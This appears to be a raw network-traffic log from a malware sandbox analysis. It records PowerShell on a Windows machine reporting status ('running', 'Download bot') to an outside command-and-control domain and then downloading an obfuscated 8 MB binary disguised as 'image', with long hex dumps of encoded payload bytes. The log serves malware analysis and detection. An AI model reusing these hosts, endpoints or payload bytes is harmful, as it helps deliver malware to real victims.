                                                                                      2024-11-08 09:46:00 UTC1369INData Raw: 65 57 5b 33 48 7b 57 6b 43 6b 52 47 58 76 52 54 65 60 62 46 4b 49 57 54 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 54 35 30 58 7b 4f 52 63 46 4b 55 4f 54 71 54 64 55 57 49 58 57 65 35 63 47 69 54 63 7b 5b 56 4c 31 71 76 5b 44 65 56 50 6c 4b 49 64 44 4f 6d 56 47 4b 72 58 32 6d 6f 60 30 50 7b 57 6b 43 6b 52 47 58 76 54 6c 30 72 62 30 71 56 50 6c 69 6a 53 33 65 7b 52 54 4f 52 63 56 47 59 64 46 79 53 63 6c 76 76 56 6d 69 4f 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 52 4c 49 53 51 54 6b 43 56 53 57 47 73 57 6d 5b 59 50 31 47 71 57 6a 65 6e 63 44 6d 49 56 6f 43 68 53 30 57 6f 52 6a 57 72 65 56 4f 48 57 6b 43 52 63 56 79 7b 56 6d 5b 42 60 46 53 49 5b 33 65 6a 4c 6a 5b 37 52 54 69 42 64 56 48 78 55 6c 79 6b 4c 31 34 72 56
                                                                                      Data Ascii: eW[3H{WkCkRGXvRTe`bFKIWT4E`TGoRTOC[1mEPVeYLT50X{ORcFKUOTqTdUWIXWe5cGiTc{[VL1qv[DeVPlKIdDOmVGKrX2mo`0P{WkCkRGXvTl0rb0qVPlijS3e{RTORcVGYdFySclvvVmiObDSSc14E`TGoRTOC[1mEPVeRLISQTkCVSWGsWm[YP1GqWjencDmIVoChS0WoRjWreVOHWkCRcVy{Vm[B`FSI[3ejLj[7RTiBdVHxUlykL14rV
                                                                                      2024-11-08 09:46:00 UTC1369INData Raw: 56 53 30 5b 37 5b 44 4c 79 54 57 6d 58 54 6c 38 4b 50 7b 47 53 56 57 69 52 63 31 6d 45 54 6c 75 60 56 44 35 76 58 57 62 30 60 46 53 49 63 49 5b 68 60 54 47 31 57 54 65 46 4c 46 47 46 54 6b 57 6b 53 30 57 6f 57 44 65 56 60 47 71 71 60 33 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 47 4b 34 5b 57 69 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 55 56 6d 62 79 65 6c 53 75 57 59 53 55 56 47 4b 72 58 6d 4f 43 65 47 57 49 53 6b 43 69 50 31 47 73 56 6a 65 56 64 6c 53 49 63 49 57 5b 56 47 4b 76 58 6b 48 31 4f 31 53 53 63 33
                                                                                      Data Ascii: VS0[7[DLyTWmXTl8KP{GSVWiRc1mETlu`VD5vXWb0`FSIcI[h`TG1WTeFLFGFTkWkS0WoWDeV`Gqq`3eme{CMRTOC[1mEPVeKP1GoRTOC[1mEPVeKPUCMRTOC[1mEPVeKP1GoRTOC[1mEPVeKRGK4[Wi{UjOoLDuKP1GoRTOC[1mEPVeKP1GoRTOC[1mEPVeKP1KUVmbyelSuWYSUVGKrXmOCeGWISkCiP1GsVjeVdlSIcIW[VGKvXkH1O1SSc3
                                                                                      2024-11-08 09:46:00 UTC1369INData Raw: 64 57 4c 78 57 6b 57 4b 53 44 54 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 54 6b 43 31 55 30 48 76 57 6a 57 53 60 30 5b 56 57 31 4f 43 60 57 4b 49 57 6b 43 60 57 32 69 72 52 54 57 60 62 46 4b 49 57 56 65 4a 52 47 4b 72 58 6d 69 42 53 33 47 59 64 46 79 4b 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 55 56 6d 62 79 65 6c 53 75 57 59 53 55 56 47 4b 72 58 6d 4f 43 65 47 57 49 53 6b 43 69 50 31 47 73 5b 44 65 56 65 46 4f 47 56 6f 43 68 53 30 57 6f 55 47 57 60 65 6c 4f 75 55 6c 79 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4e 54 6d 49 57 6f 4f 6b 4c 6d 57 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f
                                                                                      Data Ascii: dWLxWkWKSDT2SGGw[1mEPVeKP1GoRTOC[1mEPVeKP1GoTkC1U0HvWjWS`0[VW1OC`WKIWkC`W2irRTW`bFKIWVeJRGKrXmiBS3GYdFyK`oONP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1KUVmbyelSuWYSUVGKrXmOCeGWISkCiP1Gs[DeVeFOGVoChS0WoUGW`elOuUlyDTV8oRTOC[1mEPVeKP1GoRTOBNTmIWoOkLmWo[YbvR1mEPVeKP1GoRTO
                                                                                      2024-11-08 09:46:00 UTC1369INData Raw: 57 4b 37 55 46 6a 31 65 54 6d 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 55 6b 43 5b 56 44 6e 76 55 47 5b 4e 62 30 71 59 57 6f 65 4b 50 7b 47 54 56 6d 65 4e 65 6c 4b 75 54 6f 71 4b 50 30 4b 34 56 6d 69 52 64 56 57 57 54 6c 79 68 53 31 58 30 54 30 62 30 57 47 71 59 55 6f 5b 68 63 57 4b 37 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6b 6d 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 6b 6d 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 6f 43 60 60 54 47 77 55 47 62 30 65 6c 53 45 50 56 75 60 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 6d 53 6a 57 31 34 70 56 6d 65 56 60 30 71 59 54 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b
                                                                                      Data Ascii: WK7UFj1eTmoLDuKP1GoRTOC[1mEPVeKP1GoRTOC[1mFUkC[VDnvUG[Nb0qYWoeKP{GTVmeNelKuToqKP0K4VmiRdVWWTlyhS1X0T0b0WGqYUo[hcWK7SGGw[1mEPVeKP1GoRTOC[1mEPkmDTV8oRTOC[1mEPVeKRECNP3mC[1mEPkmDTV8NP3mC[1mEPoC``TGwUGb0elSEPVu`S{j{Xl05emmYTmSjW14pVmeV`0qYTYCKRIONP3mC[1mEPVeK
                                                                                      2024-11-08 09:46:00 UTC1369INData Raw: 47 58 50 6c 69 68 50 31 47 31 57 6d 69 4e 63 46 4f 73 63 46 75 4b 50 31 71 54 57 30 5b 4e 57 57 4b 57 4c 46 6d 4b 50 7b 47 55 5b 47 62 30 55 57 71 58 56 6c 79 68 50 31 4b 4b 58 57 65 6a 63 30 71 58 55 6b 43 51 65 7b 43 4d 52 6a 69 52 64 56 47 59 5b 46 34 60 56 44 6d 6f 54 47 4f 42 55 30 71 58 58 32 53 57 4c 6a 34 77 56 6d 65 52 4c 56 4b 49 57 6c 75 56 53 31 5b 37 58 55 47 52 64 56 47 59 5b 46 34 60 56 44 6d 6f 55 47 57 46 4c 47 53 49 4e 56 34 54 4c 6b 50 32 53 47 47 77 60 33 4c 78 57 6b 43 6a 53 33 79 30 56 6b 4f 4f 5b 30 43 55 50 6a 38 60 56 46 4f 31 57 55 4b 4e 63 30 71 59 54 6b 47 68 53 30 5b 73 57 6a 65 46 64 6c 44 79 55 6c 79 6a 52 47 4b 76 58 6c 30 6a 64 6d 54 78 57 6b 43 4b 50 7b 47 42 58 6a 65 35 65 6c 50 79 55 6b 43 5b 56 44 6e 76 54 30 65 60 54
                                                                                      Data Ascii: GXPlihP1G1WmiNcFOscFuKP1qTW0[NWWKWLFmKP{GU[Gb0UWqXVlyhP1KKXWejc0qXUkCQe{CMRjiRdVGY[F4`VDmoTGOBU0qXX2SWLj4wVmeRLVKIWluVS1[7XUGRdVGY[F4`VDmoUGWFLGSINV4TLkP2SGGw`3LxWkCjS3y0VkOO[0CUPj8`VFO1WUKNc0qYTkGhS0[sWjeFdlDyUlyjRGKvXl0jdmTxWkCKP{GBXje5elPyUkC[VDnvT0e`T


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.11.3049766172.67.137.624438756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:46:00 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 140
                                                                                      2024-11-08 09:46:00 UTC140OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 44 79 6c 61 6e 65 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                      Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
                                                                                      2024-11-08 09:46:01 UTC945INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:46:01 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QqBGIXr0Fd1vHWvGVwy0fWZoQrwPiuJ1qOf%2BmquxuFS%2Bz8vFihnAXK1TqTlAWGx8v1tcnwYvQ71ImtM6UbUNfixkFnz8HrAgaYCcC%2FTQD4KKLYtdzSfu9IjpeGa5RLXoxYj4AQtnemm"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1462&sent=29725&recv=15486&lost=0&retrans=0&sent_bytes=41282972&recv_bytes=167819&delivery_rate=53947214&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a22c7cec422f-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102421&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1090&delivery_rate=37502&cwnd=252&unsent_bytes=0&cid=1a2a2a2434da4677&ts=819&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.11.3049769172.67.137.624438756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:46:13 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 69
                                                                                      2024-11-08 09:46:13 UTC69OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                      Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
                                                                                      2024-11-08 09:46:14 UTC950INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:46:14 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMnmzj%2FU1hsKPJbjiELakCRxWH3HUO2W1pfxbk02FG4jTsZq8OZYzWgq%2F6VXKpbLs7SkIJUZ84OEJX92tusNCZn3aMDRAi5QWEj72YxzS%2Bz%2B5Eu8Bmkn7Do%2F8MRrTmCOvhBAwvv5Yvw1"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=14461&sent=35927&recv=18497&lost=0&retrans=0&sent_bytes=50039669&recv_bytes=179251&delivery_rate=43777258&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a27b9d4205bb-IAD
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=113270&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1018&delivery_rate=34507&cwnd=186&unsent_bytes=0&cid=b007018a35ba03f7&ts=830&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.11.3049770172.67.137.624438756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:46:14 UTC338OUTGET /file2/30bb492ec87899a2b4a8fa5c9eeec469ac5d7939c1a666e89b2957d1443edc11d1052886fe1517bdaf10c9278dc72d04afcd88afb6e1e8bfd78687aff3d34d26ad6eb1ddfeabc5826fb14cc32d25c72b9583791a899f256f8566bc1538ad7c1f HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      2024-11-08 09:46:15 UTC1066INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:46:15 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 8351232
                                                                                      Connection: close
                                                                                      content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1Kb9SqQLr84dLvYeLFydeOHdy9QXLznacAbXrh0PkAegKfu4vVQVZDvmH4IfFNIo20DrMqkA3eOjVPuWBlc3LPlzBrJIPM%2BsFFyqmRt8rHJ2nPcQAZ5NWIQoUP%2BDm%2BYBcHWgBKmsEc%2F"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=19610&sent=35929&recv=18499&lost=0&retrans=0&sent_bytes=50040426&recv_bytes=180194&delivery_rate=43777258&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a2824cc90f75-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=104017&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=976&delivery_rate=35436&cwnd=237&unsent_bytes=0&cid=c4587a6cb03f89ae&ts=867&x=0"
                                                                                      2024-11-08 09:46:15 UTC303INData Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23
                                                                                      Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
                                                                                      2024-11-08 09:46:15 UTC1369INData Raw: 01 07 01 01 01 01 01 01 01 01 71 99 01 01 05 01 01 01 01 01 01 02 01 61 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01 11 01 01 01 29 0d 01 01 05 01 01 01 01 01 01 01 01 01 01 01 01 01 01 21 01 01 61 2f 6c 60 6f 60 66 64 65 09 ab 3a 01 01 41 0d 01 01 ad 3a 01 01 2d
                                                                                      Data Ascii: qa)Yi)UAqEQ1)A^/udyuy&)!a/l`o`fde:A:-
                                                                                      2024-11-08 09:46:15 UTC1369INData Raw: c5 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 84 d5 25 01 49 8c 04 07 d6 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bb d2 25 01 49 8c 04 da d6 4f 01 49 8c 0c cd d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 9c d2 25 01 49 8c 04 df
                                                                                      Data Ascii: OI8tI%IOIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%I
                                                                                      2024-11-08 09:46:15 UTC1369INData Raw: 38 01 74 00 c2 49 8a d1 e8 33 ce 25 01 49 8c 04 3a db 4f 01 49 8c 0c 2d db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 66 cf 25 01 49 8c 04 71 db 4f 01 49 8c 0c 60 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b cf 25 01 49 8c 04 92 db 4f 01 49 8c 0c
                                                                                      Data Ascii: 8tI3%I:OI-OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8tIf%IqOI`OI8tIK%IOI
                                                                                      2024-11-08 09:46:15 UTC516INData Raw: 49 8c 04 8e 57 90 01 49 8a 01 49 8c 0c 74 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c9 25 01 49 8c 04 0e 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c9 25
                                                                                      Data Ascii: IWIItOI8tI%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,OI8tI%IWIIOI8tI%
                                                                                      2024-11-08 09:46:15 UTC1369INData Raw: 54 90 01 49 8a 01 49 8c 0c c4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c6 25 01 49 8c 04 96 54 90 01 49 8a 01 49 8c 0c ac cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c6 25 01 49 8c 04 86 54 90 01 49 8a 01 49 8c 0c 9c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c6 25 01 49 8c 04 76 54 90 01 49 8a 01 49 8c 0c 84 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c6 25 01 49 8c 04 66 54 90 01 49 8a 01 49 8c 0c 6c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c6 25 01 49 8c 04 4e 54 90 01 49 8a 01 49 8c 0c 54 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c6 25 01 49 8c 04 36 54 90 01 49 8a 01 49 8c 0c 3c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c7 25 01 49 8c 04 26 54 90 01 49 8a 01 49 8c 0c 24 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c7 25 01 49 8c 04
                                                                                      Data Ascii: TIIOI8tI%ITIIOI8tI%ITIIOI8tIg%IvTIIOI8tIG%IfTIIlOI8tI'%INTIITOI8tI%I6TII<OI8tI%I&TII$OI8tI%I
                                                                                      2024-11-08 09:46:15 UTC1369INData Raw: c3 25 01 49 8c 04 d6 53 90 01 49 8a 01 49 8c 0c 5c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c3 25 01 49 8c 04 be 53 90 01 49 8a 01 49 8c 0c 44 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c3 25 01 49 8c 04 a6 53 90 01 49 8a 01 49 8c 0c 2c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c3 25 01 49 8c 04 8e 53 90 01 49 8a 01 49 8c 0c 14 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c0 25 01 49 8c 04 76 53 90 01 49 8a 01 49 8c 0c fc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c0 25 01 49 8c 04 5e 53 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c0 25 01 49 8c 04 46 53 90 01 49 8a 01 49 8c 0c cc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c0 25 01 49 8c 04 2e 53 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8
                                                                                      Data Ascii: %ISII\OI8tIG%ISIIDOI8tI'%ISII,OI8tI%ISIIOI8tI%IvSIIOI8tI%I^SIIOI8tI%IFSIIOI8tI%I.SIIOI8tI
                                                                                      2024-11-08 09:46:15 UTC1369INData Raw: 00 c2 49 8a d1 e8 07 bc 25 01 49 8c 04 e6 4e 90 01 49 8a 01 49 8c 0c b4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bd 25 01 49 8c 04 ce 4e 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bd 25 01 49 8c 04 c6 4e 90 01 49 8a 01 49 8c 0c 8c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bd 25 01 49 8c 04 b6 4e 90 01 49 8a 01 49 8c 0c 7c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bd 25 01 49 8c 04 ae 4e 90 01 49 8a 01 49 8c 0c 64 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bd 25 01 49 8c 04 9e 4e 90 01 49 8a 01 49 8c 0c 4c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bd 25 01 49 8c 04 96 4e 90 01 49 8a 01 49 8c 0c 34 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bd 25 01 49 8c 04 7e 4e 90 01 49 8a 01 49 8c 0c 1c c7 4f 01 49 82 38 01
                                                                                      Data Ascii: I%INIIOI8tI%INIIOI8tI%INIIOI8tI%INII|OI8tI%INIIdOI8tIg%INIILOI8tIG%INII4OI8tI'%I~NIIOI8
                                                                                      2024-11-08 09:46:15 UTC1369INData Raw: 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 6c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 5c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b6 25 01 49 8c 04 8e 4f 90 01 49 8a 01 49 8c 0c 4c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b6 25 01 49 8c 04 7e 4f 90 01 49 8a 01 49 8c 0c 34 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b6 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c 1c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b6 25 01 49 8c 04 6e 4f 90 01 49 8a 01 49 8c 0c 04 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b7 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c ec c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b7 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c d4
                                                                                      Data Ascii: OI8tI%IOIIlOI8tI%IOII\OI8tIg%IOIILOI8tIG%I~OII4OI8tI'%IvOIIOI8tI%InOIIOI8tI%IVOIIOI8tI%I>OII
